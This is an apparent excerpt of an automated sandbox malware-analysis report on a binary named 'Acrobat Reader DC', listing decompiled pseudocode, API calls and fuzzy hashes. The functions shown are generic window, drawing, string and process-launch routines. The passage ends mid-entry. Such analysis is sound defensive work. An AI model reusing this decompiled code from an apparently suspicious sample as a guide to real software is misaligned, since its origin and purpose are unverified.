                                  0x00434d57
                                  0x00434d5f
                                  0x00434d5f
                                  0x00434d64
                                  0x00434d6a
                                  0x00434d6c
                                  0x00434d71
                                  0x00434d71
                                  0x00434d77
                                  0x00434d7a
                                  0x00434d86
                                  0x00000000
                                  0x00434d86
                                  0x00000000

                                  APIs
                                    • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                    • Part of subcall function 00434C09: lstrcpyW.KERNEL32 ref: 00434C44
                                    • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                  • lstrlenW.KERNEL32(?), ref: 00434CF6
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • lstrcpyW.KERNEL32 ref: 00434D1E
                                  • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: lstrcmpilstrcpylstrlen$_malloc
                                  • String ID: cdecl
                                  • API String ID: 3850814276-3896280584
                                  • Opcode ID: 735b47e65ab2a3ecff459c406ccee83f25449b742c89b67713f935960f6b94f6
                                  • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                  • Opcode Fuzzy Hash: 735b47e65ab2a3ecff459c406ccee83f25449b742c89b67713f935960f6b94f6
                                  • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004368A0(void* _a4, intOrPtr* _a8) {
				int _v8;
				void* _v12;
				int _t16;
				long _t29;
				struct HWND__** _t38;

				_t38 = _a4;
				SendMessageW( *_t38, 0xb0,  &_a4,  &_v12);
				_t16 = _a4;
				_v8 = _t16;
				_t29 = SendMessageW( *_t38, 0xc9, _t16, 0);
				if(_t29 < 1) {
					 *_a8 = _a4 + 1;
					return 1;
				} else {
					if(_t29 == SendMessageW( *_t38, 0xc9, _a4, 0)) {
						do {
							_a4 = _a4 - 1;
						} while (_t29 == SendMessageW( *_t38, 0xc9, _a4 - 1, 0));
					}
					 *_a8 = _v8 - _a4;
					return 1;
				}
			}








                                  0x004368a8
                                  0x004368c2
                                  0x004368c4
                                  0x004368ca
                                  0x004368d7
                                  0x004368dc
                                  0x00436929
                                  0x00436931
                                  0x004368de
                                  0x004368f0
                                  0x004368f2
                                  0x004368f9
                                  0x00436906
                                  0x004368f2
                                  0x00436915
                                  0x0043691d
                                  0x0043691d

                                  APIs
                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                  • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                  • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                  • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004301F8(struct HWND__** _a4, long _a8, WCHAR* _a12, WCHAR* _a16, signed int _a20, int _a24, int _a28, int _a32, int _a36, struct HMENU__* _a40, char _a44) {
				long _t16;
				long _t23;
				struct HINSTANCE__* _t25;
				struct HWND__** _t33;
				struct HWND__* _t34;

				_t16 = _a8;
				_t23 = _a20 | 0x50000000;
				_t33 = _a4;
				if((_t16 & 0x00080000) != 0) {
					_t16 = _t16 & 0xfff7ffff;
				}
				_t25 =  *0x4a8684; // 0x400000
				_t34 = CreateWindowExW(_t16, _a12, _a16, _t23, _a24, _a28, _a32, _a36,  *_t33, _a40, _t25, 0);
				if(_t34 != 0) {
					if(_a44 != 0) {
						SendMessageW(_t34, 0x30, GetStockObject(0x11), 0);
					}
					if(_t33[0x64] >= 0 && _t33[0x67] != 0) {
						ShowWindow(_t34, 0);
					}
				}
				return _t34;
			}








                                  0x004301fe
                                  0x00430202
                                  0x00430209
                                  0x00430211
                                  0x00430213
                                  0x00430213
                                  0x00430218
                                  0x00430248
                                  0x0043024c
                                  0x00430252
                                  0x00430262
                                  0x00430262
                                  0x0043026f
                                  0x0043027d
                                  0x0043027d
                                  0x0043026f
                                  0x00430288

                                  APIs
                                  • CreateWindowExW.USER32 ref: 00430242
                                  • GetStockObject.GDI32(00000011), ref: 00430258
                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                  • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$CreateMessageObjectSendShowStock
                                  • String ID:
                                  • API String ID: 1358664141-0
                                  • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                  • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                  • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                  • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00443C87(struct HWND__* _a4, WCHAR* _a8, WCHAR* _a12, int _a16, char _a20) {
				intOrPtr _v8;
				char _v12;
				signed int _t11;
				char _t22;
				signed int _t23;
				void* _t24;

				_t22 = _a20;
				_t24 = 0;
				 *0x4974ee = 0;
				if(_t22 != 0) {
					 *0x4974ef = 1;
					_v12 = GetCurrentThreadId();
					_v8 = _t22;
					_t24 = E00413D7F(0, 0, E00443B61,  &_v12, 0,  &_a20);
				}
				_t11 = MessageBoxW(_a4, _a8, _a12, _a16);
				_t23 = _t11;
				if(_t24 != 0) {
					 *0x4974ef = 0;
					WaitForSingleObject(_t24, 0xffffffff);
					_t11 = CloseHandle(_t24);
				}
				if( *0x4974ee != 1) {
					return _t23;
				} else {
					return _t11 | 0xffffffff;
				}
			}









                                  0x00443c8f
                                  0x00443c92
                                  0x00443c94
                                  0x00443c9d
                                  0x00443c9f
                                  0x00443cac
                                  0x00443cbf
                                  0x00443cca
                                  0x00443cca
                                  0x00443cdc
                                  0x00443ce2
                                  0x00443ce6
                                  0x00443ceb
                                  0x00443cf2
                                  0x00443cf9
                                  0x00443cf9
                                  0x00443d06
                                  0x00443d18
                                  0x00443d09
                                  0x00443d10
                                  0x00443d10

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                  • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                  • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                  • String ID:
                                  • API String ID: 2880819207-0
                                  • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                  • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                  • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                  • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00430B87(struct HWND__** _a4, struct HWND__** _a8, int _a12) {
				struct tagPOINT _v16;
				struct tagRECT _v32;
				void* _t25;
				struct HWND__** _t49;

				_t49 = _a4;
				if(_t49[0xe] == 0) {
					GetWindowRect( *_a8,  &_v32);
					_v16.x = _v32.left;
					_v16.y = _v32.top;
					ScreenToClient( *_t49,  &_v16);
					_v32.top = _v16.y;
					_v16.x = _v32.right;
					_v32.left = _v16.x;
					_v16.y = _v32.bottom;
					ScreenToClient( *_t49,  &_v16);
					_v32.right = _v16.x;
					_v32.bottom = _v16.y;
					return InvalidateRect( *_t49,  &_v32, _a12);
				}
				return _t25;
			}







                                  0x00430b8e
                                  0x00430b96
                                  0x00430ba2
                                  0x00430bb7
                                  0x00430bbe
                                  0x00430bc1
                                  0x00430bcc
                                  0x00430bd2
                                  0x00430bd7
                                  0x00430bdf
                                  0x00430be2
                                  0x00430bed
                                  0x00430bf4
                                  0x00000000
                                  0x00430bfb
                                  0x00430c06

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ClientRectScreen$InvalidateWindow
                                  • String ID:
                                  • API String ID: 357397906-0
                                  • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                  • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                  • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                  • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00433908(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v12;
				char _v20;
				char _v536;
				char _v1052;
				char _v1568;
				char _v2084;

				_t41 = __edi;
				E00413A0E(_a4,  &_v20,  &_v2084,  &_v1568,  &_v536);
				E00413A0E(_a8,  &_v12,  &_v1052,  &_v1568,  &_v536);
				if(_v20 != 0 || _v12 != 0) {
					return E004114AB(_t41,  &_v20,  &_v12) & 0xffffff00 | _t28 != 0x00000000;
				} else {
					return E004114AB(__edi,  &_v2084,  &_v1052) & 0xffffff00 | _t30 != 0x00000000;
				}
			}









                                  0x00433908
                                  0x0043392e
                                  0x00433950
                                  0x0043395d
                                  0x00433997
                                  0x00433966
                                  0x00433981
                                  0x00433981

                                  APIs
                                  • __wsplitpath.LIBCMT ref: 0043392E
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • __wsplitpath.LIBCMT ref: 00433950
                                  • __wcsicoll.LIBCMT ref: 00433974
                                  • __wcsicoll.LIBCMT ref: 0043398A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                  • String ID:
                                  • API String ID: 1187119602-0
                                  • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                  • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                  • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                  • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421E33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00421E33(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t29;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00421725(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0042180C(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00421D46(__ebx, _t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00421C85(__ebx, _t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                  0x00421e38
                                  0x00421e3e
                                  0x00421eb1
                                  0x00000000
                                  0x00421e45
                                  0x00421e45
                                  0x00421e48
                                  0x00421e63
                                  0x00421e66
                                  0x00421e86
                                  0x00421e98
                                  0x00421e68
                                  0x00421e68
                                  0x00421e6b
                                  0x00000000
                                  0x00421e6d
                                  0x00421e7f
                                  0x00421e7f
                                  0x00421e6b
                                  0x00421eb6
                                  0x00421eba
                                  0x00421e4a
                                  0x00421e62
                                  0x00421e62
                                  0x00421e48

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                  • String ID:
                                  • API String ID: 3016257755-0
                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                  • Instruction ID: fa6d01852bb983edeafff486d0019367465e9530caf48e469f9bea5953271079
                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                  • Instruction Fuzzy Hash: FE11727250005DFBCF125E85EC41CEE3F22BB28394B9A8416FE1858131C73AC9B1AB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E00434963(intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* _t16;
				void* _t18;
				void* _t27;
				intOrPtr _t28;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t46;

				_t28 = _a8;
				_t43 = _a4;
				_t46 =  *((intOrPtr*)(_t43 + 0x10));
				if(_t46 != 0) {
					_t18 = E004111C1( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))));
					_push( ~(_t46 > 0) | (E004111C1(_t28) + _t18 + 0x00000001) * 0x00000002);
					_t41 = E004115D7(_t18, _t43,  ~(_t46 > 0) | (E004111C1(_t28) + _t18 + 0x00000001) * 0x00000002);
					E00411567(_t41,  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))));
					E00411536(_t41, _t28);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))));
					_t27 = E004111DC();
					 *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xc)))) = _t41;
					return _t27;
				}
				return _t16;
			}












                                  0x00434967
                                  0x0043496b
                                  0x0043496e
                                  0x00434972
                                  0x0043497b
                                  0x0043499c
                                  0x004349a2
                                  0x004349ab
                                  0x004349b2
                                  0x004349bc
                                  0x004349bd
                                  0x004349c8
                                  0x00000000
                                  0x004349ca
                                  0x004349ce

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$_malloc_wcscat_wcscpy
                                  • String ID:
                                  • API String ID: 1597257046-0
                                  • Opcode ID: f11043ad9d67cc5c40085a46a3b7adaa57771fda566fa35e382c82f885712106
                                  • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                  • Opcode Fuzzy Hash: f11043ad9d67cc5c40085a46a3b7adaa57771fda566fa35e382c82f885712106
                                  • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004472F1(struct HDC__* _a4, int _a8, int _a12, int _a16, int _a20, signed char _a24) {
				void* _t9;
				struct HDC__* _t19;

				_t19 = _a4;
				if((_a24 & 0x00000002) != 0) {
					E0044719B(_t19, 0, 0xffffffff, 2, 1);
					MoveToEx(_t19, _a8, _a12, 0);
					LineTo(_t19, _a16, _a20);
					if( *0x4a86ec != 0) {
						EndPath(_t19);
						 *0x4a86ec = 0;
					}
					return StrokePath(_t19);
				}
				return _t9;
			}





                                  0x004472f9
                                  0x004472fc
                                  0x00447307
                                  0x00447317
                                  0x00447326
                                  0x00447333
                                  0x00447336
                                  0x0044733c
                                  0x0044733c
                                  0x00000000
                                  0x00447344
                                  0x0044734c

                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                  • LineTo.GDI32(?,?,?), ref: 00447326
                                  • EndPath.GDI32(?), ref: 00447336
                                  • StrokePath.GDI32(?), ref: 00447344
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                  • String ID:
                                  • API String ID: 2783949968-0
                                  • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                  • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                  • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                  • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430B0F Relevance: 6.0, APIs: 4, Instructions: 34processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00430B0F(WCHAR* _a4) {
				int _t5;
				void* _t8;

				E00412F40(0x4a9568, 0, 0x44);
				E00412F40(0x4a9554, 0, 0x10);
				0x4a9568->cb = 0x44;
				 *0x4a9594 = 1;
				 *0x4a9598 = 1;
				_t5 = CreateProcessW(0, _a4, 0, 0, 0, 0x20, 0, 0, 0x4a9568, 0x4a9554);
				if(_t5 != 0) {
					_t8 = 0x4a9554->hProcess; // 0x0
					return CloseHandle(_t8);
				}
				return _t5;
			}





                                  0x00430b1b
                                  0x00430b29
                                  0x00430b52
                                  0x00430b5c
                                  0x00430b66
                                  0x00430b6c
                                  0x00430b74
                                  0x00430b76
                                  0x00000000
                                  0x00430b7d
                                  0x00430b84

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$CloseCreateHandleProcess
                                  • String ID:
                                  • API String ID: 3277943733-0
                                  • Opcode ID: e088a7bf58335eb6944ed34f3b8eeab294ed842f4155ecbba55165c5b0624384
